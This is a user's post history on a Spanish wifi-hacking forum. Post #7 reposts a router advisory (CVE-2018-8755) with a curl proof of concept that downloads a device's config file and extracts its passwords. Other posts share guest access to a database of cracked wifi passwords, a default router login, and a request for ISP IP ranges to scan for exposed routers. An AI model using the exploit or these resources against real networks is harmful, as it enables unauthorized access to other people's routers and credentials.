El libre pensamiento para un internet libre

No estas registrado.  

#1 Cañas y tapas » 500 000 000 usuarios de WinRAR pueden ser afectados. » 27-02-2019 15:59:40

dymusya
Respuestas: 4

Hola [email protected]
Si usais archivador WINRAR (en windows , claro) os recomiendo instalar nueva version, que ya la han parcheado.
19 años que ya existe esta brecha en programa, solo en enero 2019 los desaroyadores han parcheado un bug muy gordo.
si entendeis ingles, aqui el video con explicacion de la brecha


#2 Re: Hacking wireless ético: Los métodos alternativos » Hostbase 1.2 está aqui » 15-02-2019 17:43:19

Que buen video, gracias Koala por tu tiempo y trabajo, sera de muchisima ayuda.
Saludos compañero !!!

#3 Re: Hacking wireless ético: Los métodos alternativos » Hostbase 1.2 está aqui » 06-02-2019 20:47:42

Koala , muchisimas gracias por todo lo que has hecho, y que sigues ayudadndo con la informacion y no olvidas de principiantes.
Antes o despues algunos llegaran a un nivel mas avanzado y seguro que se encuentran la gente interesada que traen nuevas ideas al proyecto.
Pero el empujo mas grande y la vida al projecto hiciste tu. Y con aparicion de WPA3 y los parches para brechas WPS, creo que mas y mas gente van a buscar metodos alternativos como el tuyo. Y lo mas curioso que no los hay. Que eres pionero, si se puede decir asi en este camino.
Yo no me refiero Evil Twin en general, pero el desvio y el avanze que has conseguido hacer con hostbase.
saludos, y animo.

#4 Re: Hackeando el mundo » mapa mundial de wi-fi crackeadas » 29-01-2019 21:40:09

Madrid, queda espectacular..con la cantidad que tiene

QvurLeV.jpg

#5 Re: Hackeando el mundo » mapa mundial de wi-fi crackeadas » 29-01-2019 21:21:49

Hola [email protected],
perdonad por el retraso al responder.
Si, hubo tiempo que lo limitaban con el acceso, inroduciendo el servicio de pago (5 $), tenian discuciones, no se que han decidido, pero acabo de comprobar,
y ahora si, deja a entrar con privelegios de invitado con login/pass antichat/antichat.
De momento todo funciona y podeis ver los wifi vulnerables que estan a su alrededor.
o, lo que mas interesante, en la pagina de busqueda, buscar la MAC o ESSID en question.
O buscar por contraseñas de wifi, que tambien es curioso (mete el nombre de tu ciudad y espera... a mi me da resultados, hay algunos que para WIFI pass eligen nombre de su ciudad, vaya cosas smile
suerte y saludos :-)

P.S. Desde 2019.01.01 la cuenta de invitado trabaja de nuevo. Para usuarios invitados (no registrados) se añade la limitacion de 1 acceso a 10 segundos a la base de datos.
Esto lo que tienen añadido en su pagina web a partir de 2019.01.01

#6 Re: Cañas y tapas » Feliz Año Nuevo.. » 04-01-2019 19:52:40

Felices fiestas amigos, y a viajar :-)
HAPPY NEW YEAR

#7 Otras marcas » Obtener la contrasela de un NuCom NC-WR644GACV » 06-07-2018 23:02:18

dymusya
Respuestas: 2

Hola amigos ,hace tiempo no pasaba por aqui, para no abrir nuevo hilo, y solo por dejar si no habeis escuchado de esta brecha, os dejo aqui.
saludos.
Overview
========
Researchers of NVEL4 Cybersecurity company have discovered that it is
possible to access to the config file bypassing admin authentication and
authorization. The vulnerability has been reported to the vendor. The
vendor has confirmed the vulnerability but not issued to security advisory.

The recommendation to affected users is to update to the latest available
version and change the credentials used, since they could have been
extracted.

Some NuCom routers are exposed to internet.
Product Details
=============
* Type: Router / Access Point (Wireless Dual Band Gigabit VoIP Router)
* Vendor: NuCom
* Model Name: NC-WR644GACV
* Vulnerable Software Version: <= STA 005
* Fixed Software Version: STA 006

Vulnerability Details
===================
* CVE: 2018-8755
* Name: Unauthenticated Configuration File Download
* Type: Authentication / Authorization Bypass
* Description: An unauthorizated user can download config file by
accessing to the URL directly
* Payload: http://[hostname]/cgi-bin/config_download.cgi?action=download
* Impact: By downloading the config file an attacker can read all
password stored in plain-text and base64 then access vie web as
administrator and gain privileged control of the device.

PoC
====

[email protected]:~$ curl -s "http://vulnerable.hostname/
cgi-bin/config_download.cgi?action=download"|strings|grep -i password
InternetGatewayDevice.X_CT-COM_UserInfo.UserList.1.Password_realtext=[PLAIN
PASSWORD HERE]
InternetGatewayDevice.WANDevice.2.WANConnectionDevice.1.
WANPPPConnection.1.Password=[BASE64 PASSWORD HERE]
InternetGatewayDevice.X_CT-COM_UserInfo.UserList.2.Password_realtext=[PLAIN
TEXT PASSWORD HERE]
InternetGatewayDevice.LANDevice.1.WLANConfiguration.5.WPS.PeerPassword=[PLAIN
TEXT PASSWORD HERE]
InternetGatewayDevice.X_CT-COM_UserInfo.UserList.1.Password=[SHA256
PASSWORD HERE]
InternetGatewayDevice.X_CT-COM_UserInfo.UserList.2.Password=[SHA256
PASSWORD HERE]
InternetGatewayDevice.LANDevice.1.WLANConfiguration.1.WPS.PeerPassword=[PLAIN
TEXT PASSWORD HERE]
InternetGatewayDevice.ManagementServer.Password=[BASE64 PASSWORD HERE]
InternetGatewayDevice.ManagementServer.ConnectionRequestPassword=[BASE64
PASSWORD HERE]
[email protected]:~

#8 Seguridad y Hacking ético » Researchers Bypassed Windows Password Locks With Cortana Voice Command » 07-03-2018 23:32:40

dymusya
Respuestas: 2

los que buscan nuevas brechas, siempre las encuentran.
[email protected] echen vistazo a esto, os va a gustar.
lo he sacado de un foro del hack reseachers avanzados.
( que soy torpe en esto ) pero a [email protected] seguro va a gustar  :-)

https://motherboard.vice.com/en_us/arti … e-commands

#9 Cañas y tapas » wifi tambien se mueve con blockchain.. » 03-03-2018 22:27:44

dymusya
Respuestas: 1

Hola comunity !

Como os va la vida?

Aqui una web para echar un vistazo con la cervizita, cañas y tapas, anda..

Mundo volando al futuro ya..

Espero que os guste..

Es una idea, quizas tenga la vida, igual puede morir , pero curioso ver hasta donde llegara

https://es.worldwifi.io/

No tengo nada con ellos, ni participo ,tampoco es publicidad, solo por pura curiosidad.. pues si algo no te gusta (kcdtv) , que lo borres.

saludos a [email protected]

#11 Re: Hackeando el mundo » mapa mundial de wi-fi crackeadas » 11-12-2017 23:18:27

en dos palabras, el proyecto es ruso, y los datos se añaden a la mapa por medio de la programa routerscan, que saca todos dato sencibles (MAC adress, essid, wifi pass, wps, router login y pass) por medio de vulnerabilidades de los routers. un usuario pone rangos de IP a scanear, y todos routers que estan afectafos y estan en linea salen en resultados. ahi si vas a entrar ( login y pass de la web para usario invitado si no se me olvida era antichat / antichat ) vas a ver muchos cacharros de tu pueblo/ciudad. suerte.

#12 Re: Softwares libres en sistemas no libres » Wifi-Babel, Monitor de redes Wifi » 30-11-2017 23:51:16

gracias por otro "masterpiece" amigo. voy a quitar polvo de mi nano 2  :-)
te puedo echar la mano con traducion patcher, solo avisame. vaya pedazo de scaner hiciste. abrazos.

#13 Re: Seguridad y Hacking ético » Google rastrea móviles Android con la localización deshabilitada » 25-11-2017 00:34:47

Hecho de menos mi vieja nokia que tenia Symbian, podia romper nuezes con ella , caia desde 2 planta al asfalto, nadie me trasteaba, ni le pasaba nada...
Microsoft ha parado con el soporte de whatsup, pues solo por eso tenia que hacer upgrade... Te aprietan por todos lados, antes o despues- nos van a convertir a zombies...

#14 Re: Softwares libres en sistemas no libres » Google el primero navigador y el mas inseguro... » 25-11-2017 00:07:02

Increible, hasta donde has llegado. Gracias por compartir  y por tu pedazo del trabajo que hiciste!

#15 Re: Programas en general... » Rogue AP + SSL gratis + 4G redireccion » 21-10-2017 17:07:07

Bravo, maestro!
No encuentro mas palabras,..
No, quizas  hay otras.
Fantastico trabajo !!!
plus_un

#17 Re: Las herramientas para WPS » Wireless Air Cut, auditoria del protocolo wps en Windows » 10-10-2017 20:00:01

A ti amigo, por todos tus esfuerzos. Y que no paras, y estas loco de wifi. Sin ofensas, porque para conseguir esto hay que creer y querer lo que haces. Y tu "beiba" lo ha ganado !!!

#18 Re: Estudio de algoritmos y búsqueda de la nueva brecha » MiFibra-xxxx: La livebox ac 1700 para fibra orange y jazztel » 08-07-2017 17:51:01

Gracias LDASTING por los datos.
una prgunta, lo saco de tu respuesta ¨:

"Poniendo 192.168.1.1:8080 también se puede acceder al router el usuario es liveboxfibra
La contraseña liveboxfibra!"

la contras.  es liveboxfibra o liveboxfibra!
quiero asegurarme que esta bien puesta.

#19 Re: Hackeando el mundo » Pierre Henry, padre de la música elctronica, ha muerto. Chapó! » 06-07-2017 22:56:09

Que descances en paz, Pierre Henry. Vas a estar siempre con nosotros en tus beats y en tus pistas tan revolucionarias para su tiempo.
R.I.P.

#20 Re: Estudio de algoritmos y búsqueda de la nueva brecha » MiFibra-xxxx: La livebox ac 1700 para fibra orange y jazztel » 03-07-2017 08:12:18

estimado LDAS, puedes compartir,si no te importa ,primeras dos parejas del IP publica exterior del ruter, si prefieres por privado, para escanear rango de ip's de este provedor, haber si hay suerte y se encuentra alguno abierto al exterior.

#21 Re: Estudio de algoritmos y búsqueda de la nueva brecha » MiFibra-xxxx: La livebox ac 1700 para fibra orange y jazztel » 02-07-2017 08:40:43

Hola "my wi-fi hero" !
Sacas un diez con este topic, lo mas curioso y nuevo siempre esta aqui.
Estas redes crecen como cetas despues de la lluvia.
Tenia mucha interes y buscaba informacion, lo unico que podia averiguar, ya sabes donde..
http://3wifi.stascorp.com/find

con la busceda por nombre de ESSID y la mascara de momento sale la unica:
2017-04-25    Router Scan    37.134.0.0/16        MiFibra-AD0A    WPA2    1cellnex?
un fuerte abrazo amigo !!!

#23 Re: Noticias Kali linux, asesoramiento instalación y asuntos de compatibildades » Dual Boot con Kali 2016.1 y Windows 10 : La guía para principiantes » 30-06-2017 14:25:21

hola kcdtv.gracias por la respuesta, y perdon si no he explicado con mas detalles. Ese netbook solo tiene un disco duro de 200 Gb. La primera era XP OS, luego he hecho 2nda particion y dual boot con dos XP's 100Gb cada particion. Luego he hecho 3ra particion de 30Gb para Kali y 100Gb para un XP y 70 para otro.  Pero al hacer esto Kali ha instalado Grub y todo arranque ahora va por medio de este grub. Y es donde ya no estoy muy seguro., porque si voy a eliminar Kali anterior no se como afecta a este grub. Pues,si ahora mis expicasiones son mas claras, y esto se puede hacer,lo hare segun tu consejo en la ultima respuesta.gracias.

#24 Re: Noticias Kali linux, asesoramiento instalación y asuntos de compatibildades » Dual Boot con Kali 2016.1 y Windows 10 : La guía para principiantes » 29-06-2017 22:33:03

Muy buenas [email protected]
Tengo una pregunta.
Que mi viejecito netbook lleva tres OS ( o sea triple boot):  kali de los primeros, windows XP, windows XP.
Poco puedo sacar de pobrecito, pero con XP tengo suficiente, pues las dos quiero dejar funcionando, pero Kali, que lleva su particion, y que lleva esa tabla booteable o no se como se llama, quiero formatear y instalar nuevo kali con sus drivers actualizados y todo lo que lleva ( sobre todo para aprovechar y usar mi nueva ALFA.... ACH. ).
PArticion de disco duro para kali tiene 30 y algo Gigas.
Yo se , que tendre dedicar tiempo para hacer todo eso funcionar, pero mi pregunta,
sigo este topic para hacerlo sin muchas aventuras, o hay por aqui otro hilo ( windows 8 y linux dual boot ) me parece, y lo uso otro hilo mejor?
gracias [email protected]

#25 Re: Alfa Network » AWUS1900 "Ultra Speed" con RTL8814AU (ac1900 y MIMO4T4R): La Bestía. » 31-05-2017 10:22:35

hola, mira, si leas atentamente este mismo post, (arriba en tercer parragrafo) te ya indican, que las puedes comprar en wifi-highpower.es   Asi facil. Si no, google te indica miles de citios para encontrarlas.

Pie de página

Información del usuario

Ultimo usuario registrado: sertecom
Usuarios registrados conectados: 0
Invitados conectados: 9

Estadisticas de los foros

Número total de usuarios registrados: 1,584
Número total de temas: 1,342
Número total de mensajes: 13,582

Máx. usuarios conectados: 255 el 30-07-2019 10:48:17
Impulsado por FluxBB